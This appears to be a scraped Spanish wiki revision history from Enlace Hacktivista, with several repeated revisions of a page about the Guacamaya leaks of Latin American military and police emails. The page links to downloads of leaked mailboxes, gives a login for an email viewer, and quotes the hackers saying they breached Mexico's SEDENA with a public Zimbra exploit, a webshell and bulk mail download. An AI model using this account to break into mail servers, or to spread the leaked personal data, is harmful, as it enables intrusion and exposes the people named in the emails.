* https://la-lista.com/derechos-humanos/2022/10/10/guacamayaleaks-los-planes-secretos-del-ejercito-para-cerrar-el-caso-ayotzinapa<br />
* https://contralacorrupcion.mx/la-secreta-operacion-limpieza-del-ejercito-en-el-caso-ayotzinapa/<br />
* https://www.proceso.com.mx/nacional/2022/10/5/sedena-leaks-el-ejercito-autor-de-la-reforma-para-controlar-la-guardia-nacional-294665.html<br />
* https://causanatura.org/periodismo-cn/con-pena-nieto-y-amlo-sedena-monitoreo-a-opositores-al-fracking-en-la-huasteca-de-san-luis-potosi<br />
* https://twitter.com/isagvh/status/1577875084278112259<br />
* https://www.youtube.com/watch?v=OyNpRrhgHJQ<br />
* https://undergroundperiodismo.com/entrega-sre-a-la-sedena-reportes-internos-sobre-simpatizantes-del-ezln-en-europa/<br />
* https://laotraopinion.com.mx/guacamaya-leaks-las-fiestas-privadas-de-la-sedena-con-abusos-sexuales/<br />
* https://lahojadelpueblo2022.blogspot.com/2022/10/el-ejercito-le-seguia-los-pasos-al.html<br />
<br />
== Otros ==<br />
<br />
* Policía Nacional Civil de El Salvador (4 TB, @pnc.gob.sv)<br />
* Comando General de las Fuerzas Militares de Colombia (275 GB, @cgfm.mil.co)<br />
* Fuerza Armada de El Salvador (50 GB, @faes.gob.sv)<br />
* Comando Conjunto de las Fuerzas Armadas de Peru (35 GB, @ccffaa.mil.pe)<br />
* Ejercito del Peru (70 GB, @ejercito.mil.pe)<br />
<br />
== Arte ==<br />
<br />
Ilustraciones del [https://enlacehacktivista.org/hackback2.webm video] que muestra el hackeo. La banda sonora del video se puede encontrar [https://enlacehacktivista.org/guacamaya_soundtrack2.txt aquí.]<br />
<br />
[[File:Resistencia milenaria2.png|400px|border|una guacamaya descargando correos]]<br />
[[File:Fin_de_la_milicia.png|400px|border|Fin de la milicia]]<br />
<br />
== Cobertura mediática ==<br />
<br />
=== Chile ===<br />
* https://resumen.cl/articulos/hackeo-armada-espio-vecinos-recolectaban-leche-ninos-pandemia<br />
* https://resumen.cl/articulos/grupos-ambientales-del-biobio-en-la-mira-del-ejercito-organizaciones-contra-la-central-rucalhue-y-coordinadora-chorera-forman-parte-de-documentos-hackeados-a-las-fuerzas-armadas<br />
* https://resumen.cl/articulos/hackeo-a-correos-del-ejercito-revelo-que-espiaban-a-las-juventudes-comunistas-a-traves-de-redes-sociales<br />
* https://resumen.cl/articulos/hackeo-filtra-que-armada-ha-gastado-mas-de-690-millones-en-estados-de-excepcion-en-el-biobio-148-millones-solo-en-viaticos-viaticos-y-gratificaciones<br />
* https://interferencia.cl/articulos/mails-hackeados-informes-del-emco-recomendaron-familias-castrenses-estar-abastecidas-al<br />
* https://www.biobiochile.cl/especial/bbcl-investiga/noticias/reportajes/2022/09/22/correos-del-estado-mayor-conjunto-develan-temor-a-otro-catrillanca-y-debilidad-de-inteligencia.shtml<br />
* https://www.t13.cl/noticia/ex-ante/politica/filtracion-correos-militares-informe-efectos-detener-al-vocero-profugo-temucuicui<br />
* https://www.ciperchile.cl/2022/09/22/hackeo-masivo-al-estado-mayor-conjunto-expuso-miles-de-documentos-de-areas-sensibles-de-la-defensa/<br />
* https://www.biobiochile.cl/noticias/nacional/chile/2022/09/22/filtracion-de-correos-general-paiva-presenta-su-renuncia-a-jefatura-de-estado-mayor-conjunto.shtml<br />
* https://resumen.cl/articulos/pdi-investigaba-a-grupo-que-organizaba-recitales-poeticos-y-juntaba-dinero-para-revista-literaria-segun-documentos-filtrados-por-hackers<br />
* https://resumen.cl/articulos/autoridades-electas-del-biobio-eran-espiadas-por-fuerzas-armadas-y-la-ani-segun-revela-filtracion-hacker<br />
* https://interferencia.cl/articulos/hackeo-al-emco-la-colecta-de-la-armada-para-presos-de-punta-peuco-los-youtube-de-johannes<br />
* https://resumen.cl/articulos/hackeo-a-inteligencia-de-ff-aa-y-policias-abunda-informacion-sobre-organizaciones-sociales-pero-casi-no-hay-menciones-al-crimen-organizado<br />
* https://resumen.cl/articulos/actos-y-marchas-feministas-fueron-espiadas-por-la-pdi-en-la-region-de-valparaiso-segun-documentos-hackeados-al-estado-mayor-conjunto<br />
* https://resumen.cl/articulos/archivos-hackeados-revelan-que-organizaciones-sociales-de-osorno-tambien-fueron-investigadas-por-fuerzas-armadas-y-pdi<br />
* https://resumen.cl/articulos/hackeo-a-las-ffaa-informe-concluye-que-fpmr-podia-levantase-en-armas-con-apoyo-internacional-pese-a-que-organizacion-fue-desarticulada-hace-30-anos<br />
* https://resumen.cl/articulos/hackeo-a-las-ffaa-actividad-por-la-nacionalizacion-del-cobre-en-que-participo-daniel-jadue-era-investigada-por-la-pdi<br />
* https://resumen.cl/articulos/editorial-el-hackeo-al-emco-y-la-persistencia-de-una-odiosa-doctrina<br />
* https://www.t13.cl/noticia/ex-ante/nacional/el-manual-guerra-irregular-colombia-general-iturriaga-compartio-emco-27-09-2022<br />
* https://resumen.cl/articulos/mails-hackeados-al-emco-muestran-que-policias-y-ffaa-espiaban-al-colegio-de-profesores-as-desde-antes-del-estallido-social<br />
* https://resumen.cl/articulos/pdi-investigaba-actividades-de-grupos-de-ciclistas-de-concepcion-revelan-documentos-hackeados<br />
* https://www.biobiochile.cl/especial/bbcl-investiga/noticias/reportajes/2022/09/28/hablan-hackers-revelan-que-estado-mayor-conjunto-eligio-no-reparar-falla-que-posibilito-ataque.shtml<br />
* https://www.elclarin.cl/2022/09/27/tras-filtracion-de-correos-de-las-ff-aa-ex-miembros-del-ejercito-y-carabineros-denuncian-seguimiento-a-organizaciones-sociales/<br />
<br />
=== Peru ===<br />
* https://twitter.com/laencerronaperu/status/1578060867580690434#m<br />
<br />
=== El Salvador ===<br />
* https://elfaro.net/es/202210/el_salvador/26418/El-d%C3%ADa-en-que-inici%C3%B3-la-masacre-de-marzo-cuatro-l%C3%ADderes-nacionales-de-la-MS-13-salieron-de-Zacatecoluca.htm<br />
* https://www.elfaro.net/es/202210/el_salvador/26443/PNC-supo-de-la-liberaci%C3%B3n-ilegal-de-Crook-desde-noviembre-de-2021.htm</div>Enlacehacktivistahttps://enlacehacktivista.org/index.php?title=Fuerzas_Represivas&diff=629Fuerzas Represivas2022-10-29T17:08:15Z<p>Enlacehacktivista: /* Cobertura mediática */</p>
<hr />
<div>Nos llega 10 TB de correos filtrados por el grupo [[Guacamaya]], esta vez de organismos militares y policiales de varios paises. Publican un [https://enlacehacktivista.org/comunicado_guacamaya4.txt comunicado] y [https://enlacehacktivista.org/poema_guacamaya.txt poema] explicando sus motivos y un [https://enlacehacktivista.org/hackback2.webm video] que muestra como se descargaron los correos de esta filtración y de las [https://enlacehacktivista.org/index.php?title=Fiscalia/en dos] [https://enlacehacktivista.org/index.php?title=Extractivist_Leaks/es anteriores.]<br />
<br />
Cabe mencionar que el grupo Guacamaya nunca tendrá cuentas en redes sociales. [https://twitter.com/guacamayahacks Esta cuenta] es [https://www.milenio.com/opinion/viri-rios/no-es-normal/el-engano-de-la-cuenta-falsa-de-guacamaya falsa.]<br />
<br />
Aparte del EMCO no hemos tenido tiempo aún revisar si contienen información personal sensible o peligrosa así que de momento están solo disponibles para periodistas y otros investigadores. Para acceso a los correos, contacta con [mailto:press@ddosecrets.com DDoSecrets]<br />
<br />
== El Estado Mayor Conjunto de las Fuerza Armadas de Chile ==<br />
<br />
Se puede descargar sus correos de: https://files.enlacehacktivista.org/emco.mil.cl/<br />
<br><br />
O como torrent de: https://files.enlacehacktivista.org/emco.mil.cl.torrent<br />
<br><br />
Hay dos archivos .zip para cada empleado, nombre.zip - que contiene los correos de su bandeja de entrada, y nombre_sent.zip - que contiene los correos de su carpeta de enviados. Dentro de cada zip estan los correos en formato .eml. Se puede usar un cliente de correo como Thunderbird con la extensión ImportExportTools NG (https://addons.thunderbird.net/en-US/thunderbird/addon/importexporttools-ng/) para importar todo los .eml<br />
<br />
También tenemos un buscador basico donde se puede ver los correos en linea: https://piler.enlacehacktivista.org/<br />
<br><br />
Con el usuario: auditor@emco.mil.cl<br />
<br><br />
y la contraseña: hunter2<br />
<br><br />
Puede que no encuentre todos los correos, si se va a hacer una investigación seria es mejor descargar todo y buscar en su computadora.<br />
<br />
Puede ser de interes para quienes investigan la militarización y ocupación del territorio Mapuche buscar por ejemplo: SITREP Araucanía<br />
<br><br />
SITREP son informes diarios de actividades militares. También puede ser de interes los correos de depani@investigaciones.cl y los informes de JENAINPOL<br />
<br />
== Secretaría de la Defensa Nacional de México (6 TB) ==<br />
<br />
Terminan sus fichas sobre líderes sociales con: <br />
<blockquote><br />
Hasta el momento no se tiene conocimiento que mantenga vínculos con integrantes de organizaciones delictivas.<br />
</blockquote><br />
SEDENA no puede decir lo mismo sobre si misma.<br />
<br><br />
No hemos tenido tiempo de investigar mucho, pero [https://enlacehacktivista.org/sedena acá] hemos subido algunos documentos que pueden ser de interés público, dónde se ve que clase de actividades la SEDENA está investigando como "amenazas a la seguridad nacional" en vez de investigar al crimen organizado y otras amenazas reales.<br />
<br />
=== Explicación del Hackeo ===<br />
Según las hackers:<br />
<blockquote><br />
Todas las demás filtraciones fueron descargadas con Proxyshell como se ve en [https://enlacehacktivista.org/hackback2.webm el video,] pero SEDENA fue con una vulnerabilidad antigua de Zimbra. Fue simplemente usar [https://github.com/Josexv1/CVE-2022-27925 esto] para explotar la vulnerabilidad y subir una webshell, y luego usar la webshell para descargar todos los correos de /opt/zimbra/store. Ya había muchas otras webshells allí, con fecha desde el 5 de Julio (la fecha puede ser facilmente cambiado con touch -t pero también esta documentado que en Julio se empezó a explotar muchos servidores de Zimbra) y vimos que otros hackers también estuvieron descargando los correos a la vez.<br />
</blockquote><br />
<br />
=== Cobertura mediática ===<br />
* https://latinus.us/2022/09/29/loret-capitulo-96/<br />
Sobre porque se publicó primero en Latinus, la guacamaya respondió:<br />
<blockquote><br />
Unos cuantos periodistas ya tenían la filtración, lo que pasa es que hacer una investigación de calidad se demora meses, Loret solo tardó unos días en encontrar algunos informes médicos de AMLO. Nos gustaría que todas tuvieran acceso a la filtración, pero en este caso no es posible, ya que hay información que en manos de narcos podría poner en riesgo a mucha gente. Sin embargo se compartió con varios periodistas de investigación, que escribieron a DDoSecrets o Enlace Hacktivista, nos guste su política y sus reportajes o no.<br />
</blockquote><br />
* https://elpais.com/mexico/2022-10-02/tengo-miedo-de-que-me-hagan-dano-los-correos-del-ejercito-mexicano-desvelan-decenas-de-abusos-sexuales-en-la-institucion.html<br />
* https://www.animalpolitico.com/2022/10/sedena-software-espia-periodistas-defensores-derechos-humanos/<br />
* https://aristeguinoticias.com/0310/mexico/sedena-nego-y-oculto-contratos-de-espionaje-pero-hackeo-evidencio-que-si-existen-periodista/<br />
* https://elpais.com/mexico/2022-10-04/el-ejercito-mexicano-investigo-a-diputados-senadores-y-gobernadores.html<br />
* https://www.sinembargo.mx/03-10-2022/4263091<br />
* https://la-lista.com/derechos-humanos/2022/10/10/guacamayaleaks-los-planes-secretos-del-ejercito-para-cerrar-el-caso-ayotzinapa<br />
* https://contralacorrupcion.mx/la-secreta-operacion-limpieza-del-ejercito-en-el-caso-ayotzinapa/<br />
* https://www.proceso.com.mx/nacional/2022/10/5/sedena-leaks-el-ejercito-autor-de-la-reforma-para-controlar-la-guardia-nacional-294665.html<br />
* https://causanatura.org/periodismo-cn/con-pena-nieto-y-amlo-sedena-monitoreo-a-opositores-al-fracking-en-la-huasteca-de-san-luis-potosi<br />
* https://twitter.com/isagvh/status/1577875084278112259<br />
* https://www.youtube.com/watch?v=OyNpRrhgHJQ<br />
* https://undergroundperiodismo.com/entrega-sre-a-la-sedena-reportes-internos-sobre-simpatizantes-del-ezln-en-europa/<br />
* https://laotraopinion.com.mx/guacamaya-leaks-las-fiestas-privadas-de-la-sedena-con-abusos-sexuales/<br />
* https://lahojadelpueblo2022.blogspot.com/2022/10/el-ejercito-le-seguia-los-pasos-al.html<br />
<br />
== Otros ==<br />
<br />
* Policía Nacional Civil de El Salvador (4 TB, @pnc.gob.sv)<br />
* Comando General de las Fuerzas Militares de Colombia (275 GB, @cgfm.mil.co)<br />
* Fuerza Armada de El Salvador (50 GB, @faes.gob.sv)<br />
* Comando Conjunto de las Fuerzas Armadas de Peru (35 GB, @ccffaa.mil.pe)<br />
* Ejercito del Peru (70 GB, @ejercito.mil.pe)<br />
<br />
== Arte ==<br />
<br />
Ilustraciones del [https://enlacehacktivista.org/hackback2.webm video] que muestra el hackeo. La banda sonora del video se puede encontrar [https://enlacehacktivista.org/guacamaya_soundtrack2.txt aquí.]<br />
<br />
[[File:Resistencia milenaria2.png|400px|border|una guacamaya descargando correos]]<br />
[[File:Fin_de_la_milicia.png|400px|border|Fin de la milicia]]<br />
<br />
== Cobertura mediática ==<br />
<br />
=== Chile ===<br />
* https://resumen.cl/articulos/hackeo-armada-espio-vecinos-recolectaban-leche-ninos-pandemia<br />
* https://resumen.cl/articulos/grupos-ambientales-del-biobio-en-la-mira-del-ejercito-organizaciones-contra-la-central-rucalhue-y-coordinadora-chorera-forman-parte-de-documentos-hackeados-a-las-fuerzas-armadas<br />
* https://resumen.cl/articulos/hackeo-a-correos-del-ejercito-revelo-que-espiaban-a-las-juventudes-comunistas-a-traves-de-redes-sociales<br />
* https://resumen.cl/articulos/hackeo-filtra-que-armada-ha-gastado-mas-de-690-millones-en-estados-de-excepcion-en-el-biobio-148-millones-solo-en-viaticos-viaticos-y-gratificaciones<br />
* https://interferencia.cl/articulos/mails-hackeados-informes-del-emco-recomendaron-familias-castrenses-estar-abastecidas-al<br />
* https://www.biobiochile.cl/especial/bbcl-investiga/noticias/reportajes/2022/09/22/correos-del-estado-mayor-conjunto-develan-temor-a-otro-catrillanca-y-debilidad-de-inteligencia.shtml<br />
* https://www.t13.cl/noticia/ex-ante/politica/filtracion-correos-militares-informe-efectos-detener-al-vocero-profugo-temucuicui<br />
* https://www.ciperchile.cl/2022/09/22/hackeo-masivo-al-estado-mayor-conjunto-expuso-miles-de-documentos-de-areas-sensibles-de-la-defensa/<br />
* https://www.biobiochile.cl/noticias/nacional/chile/2022/09/22/filtracion-de-correos-general-paiva-presenta-su-renuncia-a-jefatura-de-estado-mayor-conjunto.shtml<br />
* https://resumen.cl/articulos/pdi-investigaba-a-grupo-que-organizaba-recitales-poeticos-y-juntaba-dinero-para-revista-literaria-segun-documentos-filtrados-por-hackers<br />
* https://resumen.cl/articulos/autoridades-electas-del-biobio-eran-espiadas-por-fuerzas-armadas-y-la-ani-segun-revela-filtracion-hacker<br />
* https://interferencia.cl/articulos/hackeo-al-emco-la-colecta-de-la-armada-para-presos-de-punta-peuco-los-youtube-de-johannes<br />
* https://resumen.cl/articulos/hackeo-a-inteligencia-de-ff-aa-y-policias-abunda-informacion-sobre-organizaciones-sociales-pero-casi-no-hay-menciones-al-crimen-organizado<br />
* https://resumen.cl/articulos/actos-y-marchas-feministas-fueron-espiadas-por-la-pdi-en-la-region-de-valparaiso-segun-documentos-hackeados-al-estado-mayor-conjunto<br />
* https://resumen.cl/articulos/archivos-hackeados-revelan-que-organizaciones-sociales-de-osorno-tambien-fueron-investigadas-por-fuerzas-armadas-y-pdi<br />
* https://resumen.cl/articulos/hackeo-a-las-ffaa-informe-concluye-que-fpmr-podia-levantase-en-armas-con-apoyo-internacional-pese-a-que-organizacion-fue-desarticulada-hace-30-anos<br />
* https://resumen.cl/articulos/hackeo-a-las-ffaa-actividad-por-la-nacionalizacion-del-cobre-en-que-participo-daniel-jadue-era-investigada-por-la-pdi<br />
* https://resumen.cl/articulos/editorial-el-hackeo-al-emco-y-la-persistencia-de-una-odiosa-doctrina<br />
* https://www.t13.cl/noticia/ex-ante/nacional/el-manual-guerra-irregular-colombia-general-iturriaga-compartio-emco-27-09-2022<br />
* https://resumen.cl/articulos/mails-hackeados-al-emco-muestran-que-policias-y-ffaa-espiaban-al-colegio-de-profesores-as-desde-antes-del-estallido-social<br />
* https://resumen.cl/articulos/pdi-investigaba-actividades-de-grupos-de-ciclistas-de-concepcion-revelan-documentos-hackeados<br />
* https://www.biobiochile.cl/especial/bbcl-investiga/noticias/reportajes/2022/09/28/hablan-hackers-revelan-que-estado-mayor-conjunto-eligio-no-reparar-falla-que-posibilito-ataque.shtml<br />
* https://www.elclarin.cl/2022/09/27/tras-filtracion-de-correos-de-las-ff-aa-ex-miembros-del-ejercito-y-carabineros-denuncian-seguimiento-a-organizaciones-sociales/<br />
<br />
=== Peru ===<br />
* https://twitter.com/laencerronaperu/status/1578060867580690434#m<br />
<br />
=== El Salvador ===<br />
* https://elfaro.net/es/202210/el_salvador/26418/El-d%C3%ADa-en-que-inici%C3%B3-la-masacre-de-marzo-cuatro-l%C3%ADderes-nacionales-de-la-MS-13-salieron-de-Zacatecoluca.htm</div>Enlacehacktivistahttps://enlacehacktivista.org/index.php?title=Fuerzas_Represivas&diff=628Fuerzas Represivas2022-10-28T16:50:10Z<p>Enlacehacktivista: /* Cobertura mediática */</p>
<hr />
<div>Nos llega 10 TB de correos filtrados por el grupo [[Guacamaya]], esta vez de organismos militares y policiales de varios paises. Publican un [https://enlacehacktivista.org/comunicado_guacamaya4.txt comunicado] y [https://enlacehacktivista.org/poema_guacamaya.txt poema] explicando sus motivos y un [https://enlacehacktivista.org/hackback2.webm video] que muestra como se descargaron los correos de esta filtración y de las [https://enlacehacktivista.org/index.php?title=Fiscalia/en dos] [https://enlacehacktivista.org/index.php?title=Extractivist_Leaks/es anteriores.]<br />
<br />
Cabe mencionar que el grupo Guacamaya nunca tendrá cuentas en redes sociales. [https://twitter.com/guacamayahacks Esta cuenta] es [https://www.milenio.com/opinion/viri-rios/no-es-normal/el-engano-de-la-cuenta-falsa-de-guacamaya falsa.]<br />
<br />
Aparte del EMCO no hemos tenido tiempo aún revisar si contienen información personal sensible o peligrosa así que de momento están solo disponibles para periodistas y otros investigadores. Para acceso a los correos, contacta con [mailto:press@ddosecrets.com DDoSecrets]<br />
<br />
== El Estado Mayor Conjunto de las Fuerza Armadas de Chile ==<br />
<br />
Se puede descargar sus correos de: https://files.enlacehacktivista.org/emco.mil.cl/<br />
<br><br />
O como torrent de: https://files.enlacehacktivista.org/emco.mil.cl.torrent<br />
<br><br />
Hay dos archivos .zip para cada empleado, nombre.zip - que contiene los correos de su bandeja de entrada, y nombre_sent.zip - que contiene los correos de su carpeta de enviados. Dentro de cada zip estan los correos en formato .eml. Se puede usar un cliente de correo como Thunderbird con la extensión ImportExportTools NG (https://addons.thunderbird.net/en-US/thunderbird/addon/importexporttools-ng/) para importar todo los .eml<br />
<br />
También tenemos un buscador basico donde se puede ver los correos en linea: https://piler.enlacehacktivista.org/<br />
<br><br />
Con el usuario: auditor@emco.mil.cl<br />
<br><br />
y la contraseña: hunter2<br />
<br><br />
Puede que no encuentre todos los correos, si se va a hacer una investigación seria es mejor descargar todo y buscar en su computadora.<br />
<br />
Puede ser de interes para quienes investigan la militarización y ocupación del territorio Mapuche buscar por ejemplo: SITREP Araucanía<br />
<br><br />
SITREP son informes diarios de actividades militares. También puede ser de interes los correos de depani@investigaciones.cl y los informes de JENAINPOL<br />
<br />
== Secretaría de la Defensa Nacional de México (6 TB) ==<br />
<br />
Terminan sus fichas sobre líderes sociales con: <br />
<blockquote><br />
Hasta el momento no se tiene conocimiento que mantenga vínculos con integrantes de organizaciones delictivas.<br />
</blockquote><br />
SEDENA no puede decir lo mismo sobre si misma.<br />
<br><br />
No hemos tenido tiempo de investigar mucho, pero [https://enlacehacktivista.org/sedena acá] hemos subido algunos documentos que pueden ser de interés público, dónde se ve que clase de actividades la SEDENA está investigando como "amenazas a la seguridad nacional" en vez de investigar al crimen organizado y otras amenazas reales.<br />
<br />
=== Explicación del Hackeo ===<br />
Según las hackers:<br />
<blockquote><br />
Todas las demás filtraciones fueron descargadas con Proxyshell como se ve en [https://enlacehacktivista.org/hackback2.webm el video,] pero SEDENA fue con una vulnerabilidad antigua de Zimbra. Fue simplemente usar [https://github.com/Josexv1/CVE-2022-27925 esto] para explotar la vulnerabilidad y subir una webshell, y luego usar la webshell para descargar todos los correos de /opt/zimbra/store. Ya había muchas otras webshells allí, con fecha desde el 5 de Julio (la fecha puede ser facilmente cambiado con touch -t pero también esta documentado que en Julio se empezó a explotar muchos servidores de Zimbra) y vimos que otros hackers también estuvieron descargando los correos a la vez.<br />
</blockquote><br />
<br />
=== Cobertura mediática ===<br />
* https://latinus.us/2022/09/29/loret-capitulo-96/<br />
Sobre porque se publicó primero en Latinus, la guacamaya respondió:<br />
<blockquote><br />
Unos cuantos periodistas ya tenían la filtración, lo que pasa es que hacer una investigación de calidad se demora meses, Loret solo tardó unos días en encontrar algunos informes médicos de AMLO. Nos gustaría que todas tuvieran acceso a la filtración, pero en este caso no es posible, ya que hay información que en manos de narcos podría poner en riesgo a mucha gente. Sin embargo se compartió con varios periodistas de investigación, que escribieron a DDoSecrets o Enlace Hacktivista, nos guste su política y sus reportajes o no.<br />
</blockquote><br />
* https://elpais.com/mexico/2022-10-02/tengo-miedo-de-que-me-hagan-dano-los-correos-del-ejercito-mexicano-desvelan-decenas-de-abusos-sexuales-en-la-institucion.html<br />
* https://www.animalpolitico.com/2022/10/sedena-software-espia-periodistas-defensores-derechos-humanos/<br />
* https://aristeguinoticias.com/0310/mexico/sedena-nego-y-oculto-contratos-de-espionaje-pero-hackeo-evidencio-que-si-existen-periodista/<br />
* https://elpais.com/mexico/2022-10-04/el-ejercito-mexicano-investigo-a-diputados-senadores-y-gobernadores.html<br />
* https://www.sinembargo.mx/03-10-2022/4263091<br />
* https://la-lista.com/derechos-humanos/2022/10/10/guacamayaleaks-los-planes-secretos-del-ejercito-para-cerrar-el-caso-ayotzinapa<br />
* https://contralacorrupcion.mx/la-secreta-operacion-limpieza-del-ejercito-en-el-caso-ayotzinapa/<br />
* https://www.proceso.com.mx/nacional/2022/10/5/sedena-leaks-el-ejercito-autor-de-la-reforma-para-controlar-la-guardia-nacional-294665.html<br />
* https://causanatura.org/periodismo-cn/con-pena-nieto-y-amlo-sedena-monitoreo-a-opositores-al-fracking-en-la-huasteca-de-san-luis-potosi<br />
* https://twitter.com/isagvh/status/1577875084278112259<br />
* https://www.youtube.com/watch?v=OyNpRrhgHJQ<br />
* https://undergroundperiodismo.com/entrega-sre-a-la-sedena-reportes-internos-sobre-simpatizantes-del-ezln-en-europa/<br />
* https://laotraopinion.com.mx/guacamaya-leaks-las-fiestas-privadas-de-la-sedena-con-abusos-sexuales/<br />
<br />
== Otros ==<br />
<br />
* Policía Nacional Civil de El Salvador (4 TB, @pnc.gob.sv)<br />
* Comando General de las Fuerzas Militares de Colombia (275 GB, @cgfm.mil.co)<br />
* Fuerza Armada de El Salvador (50 GB, @faes.gob.sv)<br />
* Comando Conjunto de las Fuerzas Armadas de Peru (35 GB, @ccffaa.mil.pe)<br />
* Ejercito del Peru (70 GB, @ejercito.mil.pe)<br />
<br />
== Arte ==<br />
<br />
Ilustraciones del [https://enlacehacktivista.org/hackback2.webm video] que muestra el hackeo. La banda sonora del video se puede encontrar [https://enlacehacktivista.org/guacamaya_soundtrack2.txt aquí.]<br />
<br />
[[File:Resistencia milenaria2.png|400px|border|una guacamaya descargando correos]]<br />
[[File:Fin_de_la_milicia.png|400px|border|Fin de la milicia]]<br />
<br />
== Cobertura mediática ==<br />
<br />
=== Chile ===<br />
* https://resumen.cl/articulos/hackeo-armada-espio-vecinos-recolectaban-leche-ninos-pandemia<br />
* https://resumen.cl/articulos/grupos-ambientales-del-biobio-en-la-mira-del-ejercito-organizaciones-contra-la-central-rucalhue-y-coordinadora-chorera-forman-parte-de-documentos-hackeados-a-las-fuerzas-armadas<br />
* https://resumen.cl/articulos/hackeo-a-correos-del-ejercito-revelo-que-espiaban-a-las-juventudes-comunistas-a-traves-de-redes-sociales<br />
* https://resumen.cl/articulos/hackeo-filtra-que-armada-ha-gastado-mas-de-690-millones-en-estados-de-excepcion-en-el-biobio-148-millones-solo-en-viaticos-viaticos-y-gratificaciones<br />
* https://interferencia.cl/articulos/mails-hackeados-informes-del-emco-recomendaron-familias-castrenses-estar-abastecidas-al<br />
* https://www.biobiochile.cl/especial/bbcl-investiga/noticias/reportajes/2022/09/22/correos-del-estado-mayor-conjunto-develan-temor-a-otro-catrillanca-y-debilidad-de-inteligencia.shtml<br />
* https://www.t13.cl/noticia/ex-ante/politica/filtracion-correos-militares-informe-efectos-detener-al-vocero-profugo-temucuicui<br />
* https://www.ciperchile.cl/2022/09/22/hackeo-masivo-al-estado-mayor-conjunto-expuso-miles-de-documentos-de-areas-sensibles-de-la-defensa/<br />
* https://www.biobiochile.cl/noticias/nacional/chile/2022/09/22/filtracion-de-correos-general-paiva-presenta-su-renuncia-a-jefatura-de-estado-mayor-conjunto.shtml<br />
* https://resumen.cl/articulos/pdi-investigaba-a-grupo-que-organizaba-recitales-poeticos-y-juntaba-dinero-para-revista-literaria-segun-documentos-filtrados-por-hackers<br />
* https://resumen.cl/articulos/autoridades-electas-del-biobio-eran-espiadas-por-fuerzas-armadas-y-la-ani-segun-revela-filtracion-hacker<br />
* https://interferencia.cl/articulos/hackeo-al-emco-la-colecta-de-la-armada-para-presos-de-punta-peuco-los-youtube-de-johannes<br />
* https://resumen.cl/articulos/hackeo-a-inteligencia-de-ff-aa-y-policias-abunda-informacion-sobre-organizaciones-sociales-pero-casi-no-hay-menciones-al-crimen-organizado<br />
* https://resumen.cl/articulos/actos-y-marchas-feministas-fueron-espiadas-por-la-pdi-en-la-region-de-valparaiso-segun-documentos-hackeados-al-estado-mayor-conjunto<br />
* https://resumen.cl/articulos/archivos-hackeados-revelan-que-organizaciones-sociales-de-osorno-tambien-fueron-investigadas-por-fuerzas-armadas-y-pdi<br />
* https://resumen.cl/articulos/hackeo-a-las-ffaa-informe-concluye-que-fpmr-podia-levantase-en-armas-con-apoyo-internacional-pese-a-que-organizacion-fue-desarticulada-hace-30-anos<br />
* https://resumen.cl/articulos/hackeo-a-las-ffaa-actividad-por-la-nacionalizacion-del-cobre-en-que-participo-daniel-jadue-era-investigada-por-la-pdi<br />
* https://resumen.cl/articulos/editorial-el-hackeo-al-emco-y-la-persistencia-de-una-odiosa-doctrina<br />
* https://www.t13.cl/noticia/ex-ante/nacional/el-manual-guerra-irregular-colombia-general-iturriaga-compartio-emco-27-09-2022<br />
* https://resumen.cl/articulos/mails-hackeados-al-emco-muestran-que-policias-y-ffaa-espiaban-al-colegio-de-profesores-as-desde-antes-del-estallido-social<br />
* https://resumen.cl/articulos/pdi-investigaba-actividades-de-grupos-de-ciclistas-de-concepcion-revelan-documentos-hackeados<br />
* https://www.biobiochile.cl/especial/bbcl-investiga/noticias/reportajes/2022/09/28/hablan-hackers-revelan-que-estado-mayor-conjunto-eligio-no-reparar-falla-que-posibilito-ataque.shtml<br />
* https://www.elclarin.cl/2022/09/27/tras-filtracion-de-correos-de-las-ff-aa-ex-miembros-del-ejercito-y-carabineros-denuncian-seguimiento-a-organizaciones-sociales/<br />
<br />
=== Peru ===<br />
* https://twitter.com/laencerronaperu/status/1578060867580690434#m<br />
<br />
=== El Salvador ===<br />
* https://elfaro.net/es/202210/el_salvador/26418/El-d%C3%ADa-en-que-inici%C3%B3-la-masacre-de-marzo-cuatro-l%C3%ADderes-nacionales-de-la-MS-13-salieron-de-Zacatecoluca.htm</div>Enlacehacktivistahttps://enlacehacktivista.org/index.php?title=Fuerzas_Represivas&diff=627Fuerzas Represivas2022-10-22T21:02:59Z<p>Enlacehacktivista: /* Cobertura mediática */</p>
<hr />
<div>Nos llega 10 TB de correos filtrados por el grupo [[Guacamaya]], esta vez de organismos militares y policiales de varios paises. Publican un [https://enlacehacktivista.org/comunicado_guacamaya4.txt comunicado] y [https://enlacehacktivista.org/poema_guacamaya.txt poema] explicando sus motivos y un [https://enlacehacktivista.org/hackback2.webm video] que muestra como se descargaron los correos de esta filtración y de las [https://enlacehacktivista.org/index.php?title=Fiscalia/en dos] [https://enlacehacktivista.org/index.php?title=Extractivist_Leaks/es anteriores.]<br />
<br />
Cabe mencionar que el grupo Guacamaya nunca tendrá cuentas en redes sociales. [https://twitter.com/guacamayahacks Esta cuenta] es [https://www.milenio.com/opinion/viri-rios/no-es-normal/el-engano-de-la-cuenta-falsa-de-guacamaya falsa.]<br />
<br />
Aparte del EMCO no hemos tenido tiempo aún revisar si contienen información personal sensible o peligrosa así que de momento están solo disponibles para periodistas y otros investigadores. Para acceso a los correos, contacta con [mailto:press@ddosecrets.com DDoSecrets]<br />
<br />
== El Estado Mayor Conjunto de las Fuerza Armadas de Chile ==<br />
<br />
Se puede descargar sus correos de: https://files.enlacehacktivista.org/emco.mil.cl/<br />
<br><br />
O como torrent de: https://files.enlacehacktivista.org/emco.mil.cl.torrent<br />
<br><br />
Hay dos archivos .zip para cada empleado, nombre.zip - que contiene los correos de su bandeja de entrada, y nombre_sent.zip - que contiene los correos de su carpeta de enviados. Dentro de cada zip estan los correos en formato .eml. Se puede usar un cliente de correo como Thunderbird con la extensión ImportExportTools NG (https://addons.thunderbird.net/en-US/thunderbird/addon/importexporttools-ng/) para importar todo los .eml<br />
<br />
También tenemos un buscador basico donde se puede ver los correos en linea: https://piler.enlacehacktivista.org/<br />
<br><br />
Con el usuario: auditor@emco.mil.cl<br />
<br><br />
y la contraseña: hunter2<br />
<br><br />
Puede que no encuentre todos los correos, si se va a hacer una investigación seria es mejor descargar todo y buscar en su computadora.<br />
<br />
Puede ser de interes para quienes investigan la militarización y ocupación del territorio Mapuche buscar por ejemplo: SITREP Araucanía<br />
<br><br />
SITREP son informes diarios de actividades militares. También puede ser de interes los correos de depani@investigaciones.cl y los informes de JENAINPOL<br />
<br />
== Secretaría de la Defensa Nacional de México (6 TB) ==<br />
<br />
Terminan sus fichas sobre líderes sociales con: <br />
<blockquote><br />
